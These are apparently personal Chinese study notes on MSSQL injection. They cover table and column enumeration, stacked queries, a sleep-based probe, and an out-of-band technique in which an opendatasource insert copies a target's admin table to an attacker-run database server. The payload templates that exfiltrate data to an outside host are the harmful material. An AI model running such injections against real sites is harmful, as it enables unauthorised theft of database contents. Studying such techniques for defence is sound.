注意:仅用于本人学习的笔记记录,禁止进行传播分享,一旦造成严重后果与本人无关!!!
一、MSSQL反弹注入使用场景
MSSQL=>SQL Server
MSSQL注入:
反弹注入=>注入手法比较偏门(oob)
把查询到的数据插入到外部数据库中(公网ip)
二、MSSQL显错注入
information_schema
sysobjects 查表
select id,name... from sysobjects where xtype='U' 输出id这里可以在后面用的到
syscolumns 查字段
select id,name from syscolumns where id='前面查到的id值'
三、MSSQL反弹注入语句解析
反弹注入原理,将目标的数据全部反弹到自己构造的数据库中,opendatasource就是连接自己数据库用的(切勿用于其他用途,仅用于技术的学习)
insert into opendatasource( ' sqloledb ' , ' server= 数据库地址,1433端口;uid=账户名;pwd=密码;database=数据库名 ').数据库名.dbo.字段 (字段可以多个,逗号隔开)
连接数据库.库.权限.表
堆叠注入
通过分号,可以执行后面的语句
select * from news where id=1;insert into opendatasource( ' sqloledb ' , ' server= hacker数据库地址,1433端口;uid=账户名;pwd=密码;database=hacker数据库名 ').数据库名.dbo.表名 select *(被攻击网站的字段,通过order by已经判断出来了) from admin
这个表是黑客特地构造出来的,要与网站字段数是一样的,并且字段类型也要一致
堆叠注入的判断
在传参后面加入分号,若结果一致就是大概率存在堆叠注入
可在传参后加入select sleep(10)
select * from news where id =1; select sleep(10)